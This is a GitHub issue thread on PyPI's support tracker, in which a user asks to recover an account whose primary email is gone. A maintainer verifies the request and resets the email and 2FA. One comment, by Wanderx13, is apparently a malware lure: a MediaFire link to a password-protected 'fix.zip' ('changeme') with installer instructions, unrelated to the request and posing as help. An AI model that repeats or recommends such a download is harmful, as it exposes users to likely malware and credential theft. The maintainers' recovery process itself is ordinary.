### ISSUE TITLE
Account recovery request

### ISSUE THREAD

**Issue by pwna5aurus** [pypi/support#4632]
### PyPI Username

pwna5aurus

### Reason for request

i have access to the backup email, but not the primary.  I need to remove the primary (which no longer exists at the company I was laid off from).

### Recovery Codes

- [X] I never generated or have lost access to the recovery codes for my account

### Code of Conduct

- [X] I agree to follow the PSF Code of Conduct

### Acknowledgement

- [X] I understand that it may take a significant amount of time to process my account recovery request.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Thespi-Brain** [comment]
Hi @pwna5aurus,

We do have an account verification as due diligence before we can update your email. So, please contact [support@pypi.org](mailto:support@pypi.org) with your preferred email address and reference this link (https://github.com/pypi/support/issues/4632). We will proceed from there. Thanks!

**Comment by Thespi-Brain** [comment]
Hi @pwna5aurus,

I have updated the primary email address on the account. Your 2FA has been reset and a password reset has been issued. You should be able to regain access to your account after completing the password reset. Let us know if you have any more issues. Thanks.
